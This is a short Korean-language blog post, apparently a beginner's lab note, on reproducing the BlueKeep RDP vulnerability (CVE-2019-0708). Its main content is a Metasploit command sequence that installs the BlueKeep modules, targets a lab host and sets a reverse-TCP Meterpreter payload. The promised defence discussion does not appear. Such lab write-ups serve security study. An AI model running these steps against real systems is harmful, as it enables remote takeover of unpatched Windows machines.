
이 글에서는 Windows 원격 데스크톱 서비스 취약점(CVE-2019-0708)을 공유하고, 해당 취약점 및 방어 조치에 대해 자세히 설명합니다. 저는 사이버 보안 초보자로서, 여러분께 기본 자습서를 공유합니다. 주로 보안 도구와 실습에 관한 온라인 노트이며, 마음에 드셨으면 좋겠습니다. 또한, 함께 실습하며 발전해 나가길 바라며, 앞으로 네트워크 보안 및 시스템 보안 지식을 깊이 학습하고 관련 실험을 공유하겠습니다. 이 시리즈의 글이 블로거 친구들에게 도움이 되길 바라며, 글쓰기가 쉽지 않으니 고수님들은 불쾌하지 않게 봐주시길 부탁드립니다. 감사합니다!
이 글은 Windows 원격 데스크톱 서비스 취약점(CVE-2019-0708)을 공유하고, 해당 취약점 및 방어 조치에 대해 자세히 설명합니다. 저자는 네트워크 보안 초보자로서, 주로 보안 도구와 실습 작업에 관한 온라인 노트를 기반으로 한 자습서를 공유하고 있습니다. 마음에 드셨으면 좋겠습니다. 또한, 여러분이 저와 함께 작업하고 발전해 나가길 바라며, 앞으로 네트워크 보안 및 시스템 보안 지식을 더 깊이 배우고 관련 실험을 공유할 예정입니다. 요컨대, 이 시리즈의 글이 블로그 친구들에게 도움이 되길 바랍니다. 글 쓰기는 쉽지 않으니, 고수분들은 좋지 않다고 해도 비난하지 말아 주세요. 감사합니다!
해당 블로그:
[网络安全自学篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反弹shell
[网络安全自学篇] 四十四.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
핵심 명령어:
# 复制文件
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
# 开启工具
msfconsole
reload_all
search 0708
# 使用脚本
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# 查看信息
show options
show targets
info
# 设置监听地址、目标地址、反弹payload、目标类型
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3
# 运行脚本
run
exploit
# 设置带宽
Set GROOMSIZE 40